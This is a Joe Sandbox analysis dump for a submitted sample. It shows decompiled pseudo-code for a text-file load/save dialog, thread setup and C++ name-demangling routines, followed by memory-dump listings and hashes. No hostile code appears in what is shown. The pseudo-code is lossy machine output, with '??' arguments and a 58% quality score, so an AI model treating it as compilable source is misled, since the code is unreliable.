                                                                                                                                                                                                                                                                                                        					_v324 = 0x81004;
                                                                                                                                                                                                                                                                                                        					_v460 =  &_v376;
                                                                                                                                                                                                                                                                                                        					_v428 = 1;
                                                                                                                                                                                                                                                                                                        					_t64 = GetOpenFileNameA(??);
                                                                                                                                                                                                                                                                                                        					_t94 = _t93 - 4;
                                                                                                                                                                                                                                                                                                        					if((_t64 & 0xffffff00 | GetOpenFileNameA != 0x00000000) == 0) {
                                                                                                                                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						_t72 = GetDlgItem(_a4, 0x3e9);
                                                                                                                                                                                                                                                                                                        						_t96 = _t94 - 8;
                                                                                                                                                                                                                                                                                                        						_t91 =  &_v288;
                                                                                                                                                                                                                                                                                                        						_v468 =  &_v288;
                                                                                                                                                                                                                                                                                                        						 *_t96 = _t72;
                                                                                                                                                                                                                                                                                                        						if((E00401520() & 0xffffff00 | _t73 == 0x00000000) == 0) {
                                                                                                                                                                                                                                                                                                        							goto L7;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_v460 = 0x30;
                                                                                                                                                                                                                                                                                                        							_v464 = "Error";
                                                                                                                                                                                                                                                                                                        							_v468 = "Load of file failed.";
                                                                                                                                                                                                                                                                                                        							 *_t96 = _a4;
                                                                                                                                                                                                                                                                                                        							MessageBoxA(??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        							_t66 = 0;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v324 = 0x80806;
                                                                                                                                                                                                                                                                                                        					_v460 =  &_v376;
                                                                                                                                                                                                                                                                                                        					_v428 = 1;
                                                                                                                                                                                                                                                                                                        					_t80 = GetSaveFileNameA(??);
                                                                                                                                                                                                                                                                                                        					_t98 = _t93 - 4;
                                                                                                                                                                                                                                                                                                        					if((_t80 & 0xffffff00 | GetSaveFileNameA != 0x00000000) == 0) {
                                                                                                                                                                                                                                                                                                        						L7:
                                                                                                                                                                                                                                                                                                        						_t66 = 1;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						_t84 = GetDlgItem(_a4, 0x3e9);
                                                                                                                                                                                                                                                                                                        						_t99 = _t98 - 8;
                                                                                                                                                                                                                                                                                                        						_t91 =  &_v288;
                                                                                                                                                                                                                                                                                                        						_v468 =  &_v288;
                                                                                                                                                                                                                                                                                                        						 *_t99 = _t84;
                                                                                                                                                                                                                                                                                                        						if((E004016D2() & 0xffffff00 | _t85 == 0x00000000) == 0) {
                                                                                                                                                                                                                                                                                                        							goto L7;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_v460 = 0x30;
                                                                                                                                                                                                                                                                                                        							_v464 = "Error";
                                                                                                                                                                                                                                                                                                        							_v468 = "Save file failed.";
                                                                                                                                                                                                                                                                                                        							 *_t99 = _a4;
                                                                                                                                                                                                                                                                                                        							MessageBoxA(??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        							_t66 = 0;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v436 = _t66;
                                                                                                                                                                                                                                                                                                        				E0040E320(_t90, _t91,  &_v432);
                                                                                                                                                                                                                                                                                                        				return _v436;
                                                                                                                                                                                                                                                                                                        			}




































                                                                                                                                                                                                                                                                                                        0x0040187f
                                                                                                                                                                                                                                                                                                        0x00401885
                                                                                                                                                                                                                                                                                                        0x0040188f
                                                                                                                                                                                                                                                                                                        0x00401899
                                                                                                                                                                                                                                                                                                        0x0040189f
                                                                                                                                                                                                                                                                                                        0x004018a2
                                                                                                                                                                                                                                                                                                        0x004018a4
                                                                                                                                                                                                                                                                                                        0x004018a9
                                                                                                                                                                                                                                                                                                        0x004018ac
                                                                                                                                                                                                                                                                                                        0x004018b8
                                                                                                                                                                                                                                                                                                        0x004018d6
                                                                                                                                                                                                                                                                                                        0x004018db
                                                                                                                                                                                                                                                                                                        0x004018e2
                                                                                                                                                                                                                                                                                                        0x004018ef
                                                                                                                                                                                                                                                                                                        0x004018f5
                                                                                                                                                                                                                                                                                                        0x00401905
                                                                                                                                                                                                                                                                                                        0x0040190b
                                                                                                                                                                                                                                                                                                        0x00401915
                                                                                                                                                                                                                                                                                                        0x00401923
                                                                                                                                                                                                                                                                                                        0x004019c6
                                                                                                                                                                                                                                                                                                        0x004019d6
                                                                                                                                                                                                                                                                                                        0x004019de
                                                                                                                                                                                                                                                                                                        0x004019e8
                                                                                                                                                                                                                                                                                                        0x004019ea
                                                                                                                                                                                                                                                                                                        0x004019f4
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004019f6
                                                                                                                                                                                                                                                                                                        0x00401a09
                                                                                                                                                                                                                                                                                                        0x00401a0b
                                                                                                                                                                                                                                                                                                        0x00401a0e
                                                                                                                                                                                                                                                                                                        0x00401a14
                                                                                                                                                                                                                                                                                                        0x00401a18
                                                                                                                                                                                                                                                                                                        0x00401a27
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401a29
                                                                                                                                                                                                                                                                                                        0x00401a29
                                                                                                                                                                                                                                                                                                        0x00401a31
                                                                                                                                                                                                                                                                                                        0x00401a39
                                                                                                                                                                                                                                                                                                        0x00401a44
                                                                                                                                                                                                                                                                                                        0x00401a4c
                                                                                                                                                                                                                                                                                                        0x00401a51
                                                                                                                                                                                                                                                                                                        0x00401a51
                                                                                                                                                                                                                                                                                                        0x00401a27
                                                                                                                                                                                                                                                                                                        0x00401929
                                                                                                                                                                                                                                                                                                        0x00401929
                                                                                                                                                                                                                                                                                                        0x00401939
                                                                                                                                                                                                                                                                                                        0x00401941
                                                                                                                                                                                                                                                                                                        0x0040194b
                                                                                                                                                                                                                                                                                                        0x0040194d
                                                                                                                                                                                                                                                                                                        0x00401957
                                                                                                                                                                                                                                                                                                        0x00401a58
                                                                                                                                                                                                                                                                                                        0x00401a58
                                                                                                                                                                                                                                                                                                        0x0040195d
                                                                                                                                                                                                                                                                                                        0x00401970
                                                                                                                                                                                                                                                                                                        0x00401972
                                                                                                                                                                                                                                                                                                        0x00401975
                                                                                                                                                                                                                                                                                                        0x0040197b
                                                                                                                                                                                                                                                                                                        0x0040197f
                                                                                                                                                                                                                                                                                                        0x0040198e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401994
                                                                                                                                                                                                                                                                                                        0x00401994
                                                                                                                                                                                                                                                                                                        0x0040199c
                                                                                                                                                                                                                                                                                                        0x004019a4
                                                                                                                                                                                                                                                                                                        0x004019af
                                                                                                                                                                                                                                                                                                        0x004019b7
                                                                                                                                                                                                                                                                                                        0x004019bc
                                                                                                                                                                                                                                                                                                        0x004019bc
                                                                                                                                                                                                                                                                                                        0x0040198e
                                                                                                                                                                                                                                                                                                        0x00401957
                                                                                                                                                                                                                                                                                                        0x00401a5d
                                                                                                                                                                                                                                                                                                        0x00401a89
                                                                                                                                                                                                                                                                                                        0x00401a9b

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                                                                                                        • String ID: 0$Error$Load of file failed.$Save file failed.$Text Files (*.txt)$X$X$txt
                                                                                                                                                                                                                                                                                                        • API String ID: 2221118986-4035221783
                                                                                                                                                                                                                                                                                                        • Opcode ID: 123245c011ebb60f00026e2333eb700c91498b7a70da1c347f03b1a05bee33b3
                                                                                                                                                                                                                                                                                                        • Instruction ID: 791b6864530678cd1946ed1b94040bc6d96a798256f3efdc208ed694a97620fc
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 123245c011ebb60f00026e2333eb700c91498b7a70da1c347f03b1a05bee33b3
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47510AB0905308DFDB10EF25C9847C9BBF4AF45344F4084AAE89CAB351D7789A89CF86
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • TlsSetValue.KERNEL32 ref: 00410CEE
                                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00410CF7
                                                                                                                                                                                                                                                                                                        • _setjmp3.MSVCRT ref: 00410D1F
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00410D97
                                                                                                                                                                                                                                                                                                        • _endthreadex.MSVCRT(00000000,00000000), ref: 00410E04
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00410280: fprintf.MSVCRT ref: 004102C0
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseCurrentHandleThreadValue_endthreadex_setjmp3fprintf
                                                                                                                                                                                                                                                                                                        • String ID: X%$h%
                                                                                                                                                                                                                                                                                                        • API String ID: 2387900098-2111123251
                                                                                                                                                                                                                                                                                                        • Opcode ID: afb67a9da1f32ea5b8055769f7c37646c4bbc43da5d0144652c704a0bd7a2f59
                                                                                                                                                                                                                                                                                                        • Instruction ID: 13198fc10ca4ea6836e7e92751527e6844c2fb09f0a62ae1e1a6dff033c7f563
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: afb67a9da1f32ea5b8055769f7c37646c4bbc43da5d0144652c704a0bd7a2f59
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D941F9747047059FCB10EF66D588A9A7BF4AF04344F45886DE8889B312D778E9C1CB9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                                                                                                                                                        			E0040C550(signed int __eax, intOrPtr __ecx, intOrPtr __edx) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				char _v32;
                                                                                                                                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                                                                                                                                        				char _v40;
                                                                                                                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                                                                                                                        				char _v60;
                                                                                                                                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                                                                                                                                        				char _v320;
                                                                                                                                                                                                                                                                                                        				char _v324;
                                                                                                                                                                                                                                                                                                        				char _v328;
                                                                                                                                                                                                                                                                                                        				char _v332;
                                                                                                                                                                                                                                                                                                        				signed int _v336;
                                                                                                                                                                                                                                                                                                        				char _v340;
                                                                                                                                                                                                                                                                                                        				char* _v344;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v348;
                                                                                                                                                                                                                                                                                                        				char _v352;
                                                                                                                                                                                                                                                                                                        				char* _v356;
                                                                                                                                                                                                                                                                                                        				signed char* _v360;
                                                                                                                                                                                                                                                                                                        				signed char _v364;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v368;
                                                                                                                                                                                                                                                                                                        				char _v372;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v384;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v388;
                                                                                                                                                                                                                                                                                                        				signed int _v392;
                                                                                                                                                                                                                                                                                                        				char _v400;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v404;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v408;
                                                                                                                                                                                                                                                                                                        				signed int _t88;
                                                                                                                                                                                                                                                                                                        				signed int _t90;
                                                                                                                                                                                                                                                                                                        				void* _t96;
                                                                                                                                                                                                                                                                                                        				void* _t99;
                                                                                                                                                                                                                                                                                                        				signed int _t102;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t107;
                                                                                                                                                                                                                                                                                                        				signed int _t112;
                                                                                                                                                                                                                                                                                                        				signed int _t124;
                                                                                                                                                                                                                                                                                                        				int _t125;
                                                                                                                                                                                                                                                                                                        				signed int _t128;
                                                                                                                                                                                                                                                                                                        				signed int _t129;
                                                                                                                                                                                                                                                                                                        				signed char* _t130;
                                                                                                                                                                                                                                                                                                        				char* _t131;
                                                                                                                                                                                                                                                                                                        				signed char* _t135;
                                                                                                                                                                                                                                                                                                        				signed char* _t136;
                                                                                                                                                                                                                                                                                                        				signed int _t140;
                                                                                                                                                                                                                                                                                                        				signed int _t141;
                                                                                                                                                                                                                                                                                                        				signed int _t142;
                                                                                                                                                                                                                                                                                                        				void* _t144;
                                                                                                                                                                                                                                                                                                        				signed int _t145;
                                                                                                                                                                                                                                                                                                        				signed int _t147;
                                                                                                                                                                                                                                                                                                        				signed int _t148;
                                                                                                                                                                                                                                                                                                        				signed char* _t162;
                                                                                                                                                                                                                                                                                                        				void* _t163;
                                                                                                                                                                                                                                                                                                        				signed char* _t165;
                                                                                                                                                                                                                                                                                                        				void* _t169;
                                                                                                                                                                                                                                                                                                        				void* _t170;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t171;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t173;
                                                                                                                                                                                                                                                                                                        				void* _t175;
                                                                                                                                                                                                                                                                                                        				void* _t183;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t88 = __eax;
                                                                                                                                                                                                                                                                                                        				_t130 = __eax;
                                                                                                                                                                                                                                                                                                        				_t171 = _t170 - 0x18c;
                                                                                                                                                                                                                                                                                                        				_v384 = __edx;
                                                                                                                                                                                                                                                                                                        				_t147 =  *__eax & 0x000000ff;
                                                                                                                                                                                                                                                                                                        				_v388 = __ecx;
                                                                                                                                                                                                                                                                                                        				_t175 = _t147 - 0x5f;
                                                                                                                                                                                                                                                                                                        				if(_t175 == 0) {
                                                                                                                                                                                                                                                                                                        					_t163 = 1;
                                                                                                                                                                                                                                                                                                        					if( *((char*)(__eax + 1)) != 0x5a) {
                                                                                                                                                                                                                                                                                                        						goto L1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					L8:
                                                                                                                                                                                                                                                                                                        					 *_t171 = _t130;
                                                                                                                                                                                                                                                                                                        					_v392 = _t147;
                                                                                                                                                                                                                                                                                                        					_t90 = strlen(??);
                                                                                                                                                                                                                                                                                                        					_v372 = _t130;
                                                                                                                                                                                                                                                                                                        					_v364 = 0x11;
                                                                                                                                                                                                                                                                                                        					_v360 = _t130;
                                                                                                                                                                                                                                                                                                        					_v352 = 0;
                                                                                                                                                                                                                                                                                                        					_v340 = 0;
                                                                                                                                                                                                                                                                                                        					_t141 = _t90;
                                                                                                                                                                                                                                                                                                        					_v368 = _t130 + _t90;
                                                                                                                                                                                                                                                                                                        					_v348 = _t141 + _t141;
                                                                                                                                                                                                                                                                                                        					_v336 = _t141;
                                                                                                                                                                                                                                                                                                        					_v332 = 0;
                                                                                                                                                                                                                                                                                                        					_v328 = 0;
                                                                                                                                                                                                                                                                                                        					_v324 = 0;
                                                                                                                                                                                                                                                                                                        					_t96 = E0040DB20(0x00000012 + (_t141 + _t141 + _t141 * 0x00000004) * 0x00000004 & 0xfffffff0);
                                                                                                                                                                                                                                                                                                        					_t99 = E0040DB20(0x00000012 + _t141 * 0x00000004 & 0xfffffff0);
                                                                                                                                                                                                                                                                                                        					_t148 = _v392;
                                                                                                                                                                                                                                                                                                        					_t173 = _t171 - _t96 - _t99;
                                                                                                                                                                                                                                                                                                        					_t183 = _t163 - 1;
                                                                                                                                                                                                                                                                                                        					_v356 =  &_v400;
                                                                                                                                                                                                                                                                                                        					_v344 =  &_v400;
                                                                                                                                                                                                                                                                                                        					if(_t183 == 0) {
                                                                                                                                                                                                                                                                                                        						_t142 = 0;
                                                                                                                                                                                                                                                                                                        						if(_t148 == 0x5f) {
                                                                                                                                                                                                                                                                                                        							_t148 =  *(_t130 + 1) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        							_v360 = _t130 + 1;
                                                                                                                                                                                                                                                                                                        							if(_t148 != 0x5a) {
                                                                                                                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_v360 = _t130 + 2;
                                                                                                                                                                                                                                                                                                        							_t133 =  &_v372;
                                                                                                                                                                                                                                                                                                        							_t142 = E00406810( &_v372, 1);
                                                                                                                                                                                                                                                                                                        							if((_v364 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                                        								while(1) {
                                                                                                                                                                                                                                                                                                        									_t165 = _v360;
                                                                                                                                                                                                                                                                                                        									_t148 =  *_t165 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        									if(_t148 != 0x2e) {
                                                                                                                                                                                                                                                                                                        										goto L20;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									_t112 = _t165[1] & 0x000000ff;
                                                                                                                                                                                                                                                                                                        									_t85 = _t112 - 0x61; // -7
                                                                                                                                                                                                                                                                                                        									if(_t85 <= 0x19 || _t112 == 0x5f || _t112 - 0x30 <= 9) {
                                                                                                                                                                                                                                                                                                        										_t142 = E00405190(_t133, _t142);
                                                                                                                                                                                                                                                                                                        										continue;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										_t148 =  *_t165 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        										goto L20;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_t148 =  *_v360 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						if(_t183 < 0 || _t163 > 3) {
                                                                                                                                                                                                                                                                                                        							_t142 = E00405ED0( &_v372);
                                                                                                                                                                                                                                                                                                        							_t148 =  *_v360 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_t162 = _t130 + 0xb;
                                                                                                                                                                                                                                                                                                        							_v360 = _t162;
                                                                                                                                                                                                                                                                                                        							if( *((char*)(_t130 + 0xb)) != 0x5f ||  *((char*)(_t130 + 0xc)) != 0x5a) {
                                                                                                                                                                                                                                                                                                        								 *_t173 = _t162;
                                                                                                                                                                                                                                                                                                        								_t134 =  &_v372;
                                                                                                                                                                                                                                                                                                        								_t144 = E00404FF0( &_v372, strlen(??), _t162);
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_v360 = _t130 + 0xd;
                                                                                                                                                                                                                                                                                                        								_t134 =  &_v372;
                                                                                                                                                                                                                                                                                                        								_t144 = E00406810( &_v372, 0);
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							 *_t173 = 0;
                                                                                                                                                                                                                                                                                                        							_t124 = E00404F90(_t134, _t144, (0 | _t163 != 0x00000002) + 0x42);
                                                                                                                                                                                                                                                                                                        							_t135 = _v360;
                                                                                                                                                                                                                                                                                                        							 *_t173 = _t135;
                                                                                                                                                                                                                                                                                                        							_v392 = _t124;
                                                                                                                                                                                                                                                                                                        							_t125 = strlen(??);
                                                                                                                                                                                                                                                                                                        							_t142 = _v392;
                                                                                                                                                                                                                                                                                                        							_t136 = _t135 + _t125;
                                                                                                                                                                                                                                                                                                        							_v360 = _t136;
                                                                                                                                                                                                                                                                                                        							_t148 =  *_t136 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						L20:
                                                                                                                                                                                                                                                                                                        						_t102 = 0;
                                                                                                                                                                                                                                                                                                        						if(_t148 == 0 && _t142 != 0) {
                                                                                                                                                                                                                                                                                                        							_t131 =  &_v320;
                                                                                                                                                                                                                                                                                                        							_v64 = 0;
                                                                                                                                                                                                                                                                                                        							_v60 = 0;
                                                                                                                                                                                                                                                                                                        							_v48 = 0;
                                                                                                                                                                                                                                                                                                        							_v56 = _v384;
                                                                                                                                                                                                                                                                                                        							_v44 = 0;
                                                                                                                                                                                                                                                                                                        							_v36 = 0;
                                                                                                                                                                                                                                                                                                        							_v32 = 0;
                                                                                                                                                                                                                                                                                                        							_v52 = _v388;
                                                                                                                                                                                                                                                                                                        							_v40 = 0;
                                                                                                                                                                                                                                                                                                        							E004079F0(_t131, _t142, 0x11);
                                                                                                                                                                                                                                                                                                        							_t107 = _v64;
                                                                                                                                                                                                                                                                                                        							 *_t173 = _t131;
                                                                                                                                                                                                                                                                                                        							 *((char*)(_t169 + _t107 - 0x13c)) = 0;
                                                                                                                                                                                                                                                                                                        							_v404 = _v52;
                                                                                                                                                                                                                                                                                                        							_v408 = _t107;
                                                                                                                                                                                                                                                                                                        							_v56();
                                                                                                                                                                                                                                                                                                        							_t102 = 0 | _v40 == 0x00000000;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						return _t102;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				L1:
                                                                                                                                                                                                                                                                                                        				asm("repe cmpsb");
                                                                                                                                                                                                                                                                                                        				_t140 = 0 | _t175 > 0x00000000;
                                                                                                                                                                                                                                                                                                        				_t163 = 0;
                                                                                                                                                                                                                                                                                                        				if(_t140 != (_t88 & 0xffffff00 | _t175 > 0x00000000)) {
                                                                                                                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_t128 =  *(_t130 + 8) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        				if(_t128 == 0x2e || _t128 == 0x5f) {
                                                                                                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                                                                                                        					_t129 =  *(_t130 + 9) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        					_t10 = _t129 == 0x49;
                                                                                                                                                                                                                                                                                                        					_t145 = _t140 & 0xffffff00 | _t10;
                                                                                                                                                                                                                                                                                                        					if(_t10 == 0) {
                                                                                                                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                                                                                                                        						_t163 = 0;
                                                                                                                                                                                                                                                                                                        						if( *((char*)(_t130 + 0xa)) == 0x5f) {
                                                                                                                                                                                                                                                                                                        							_t163 = (_t145 << 0x1f >> 0x1f) + 3;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t163 = 0;
                                                                                                                                                                                                                                                                                                        					if(_t129 != 0x44) {
                                                                                                                                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					if(_t128 != 0x24) {
                                                                                                                                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}
































































                                                                                                                                                                                                                                                                                                        0x0040c550
                                                                                                                                                                                                                                                                                                        0x0040c556
                                                                                                                                                                                                                                                                                                        0x0040c558
                                                                                                                                                                                                                                                                                                        0x0040c55e
                                                                                                                                                                                                                                                                                                        0x0040c564
                                                                                                                                                                                                                                                                                                        0x0040c567
                                                                                                                                                                                                                                                                                                        0x0040c56d
                                                                                                                                                                                                                                                                                                        0x0040c570
                                                                                                                                                                                                                                                                                                        0x0040c714
                                                                                                                                                                                                                                                                                                        0x0040c719
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c5c0
                                                                                                                                                                                                                                                                                                        0x0040c5c0
                                                                                                                                                                                                                                                                                                        0x0040c5c3
                                                                                                                                                                                                                                                                                                        0x0040c5c9
                                                                                                                                                                                                                                                                                                        0x0040c5ce
                                                                                                                                                                                                                                                                                                        0x0040c5d4
                                                                                                                                                                                                                                                                                                        0x0040c5de
                                                                                                                                                                                                                                                                                                        0x0040c5e4
                                                                                                                                                                                                                                                                                                        0x0040c5ee
                                                                                                                                                                                                                                                                                                        0x0040c5f8
                                                                                                                                                                                                                                                                                                        0x0040c5fd
                                                                                                                                                                                                                                                                                                        0x0040c606
                                                                                                                                                                                                                                                                                                        0x0040c619
                                                                                                                                                                                                                                                                                                        0x0040c61f
                                                                                                                                                                                                                                                                                                        0x0040c629
                                                                                                                                                                                                                                                                                                        0x0040c633
                                                                                                                                                                                                                                                                                                        0x0040c63d
                                                                                                                                                                                                                                                                                                        0x0040c652
                                                                                                                                                                                                                                                                                                        0x0040c657
                                                                                                                                                                                                                                                                                                        0x0040c65d
                                                                                                                                                                                                                                                                                                        0x0040c65f
                                                                                                                                                                                                                                                                                                        0x0040c666
                                                                                                                                                                                                                                                                                                        0x0040c66c
                                                                                                                                                                                                                                                                                                        0x0040c672
                                                                                                                                                                                                                                                                                                        0x0040c725
                                                                                                                                                                                                                                                                                                        0x0040c72a
                                                                                                                                                                                                                                                                                                        0x0040c7f0
                                                                                                                                                                                                                                                                                                        0x0040c7f7
                                                                                                                                                                                                                                                                                                        0x0040c800
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c80e
                                                                                                                                                                                                                                                                                                        0x0040c814
                                                                                                                                                                                                                                                                                                        0x0040c828
                                                                                                                                                                                                                                                                                                        0x0040c82a
                                                                                                                                                                                                                                                                                                        0x0040c84b
                                                                                                                                                                                                                                                                                                        0x0040c84b
                                                                                                                                                                                                                                                                                                        0x0040c851
                                                                                                                                                                                                                                                                                                        0x0040c857
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c85d
                                                                                                                                                                                                                                                                                                        0x0040c861
                                                                                                                                                                                                                                                                                                        0x0040c867
                                                                                                                                                                                                                                                                                                        0x0040c849
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x00000000
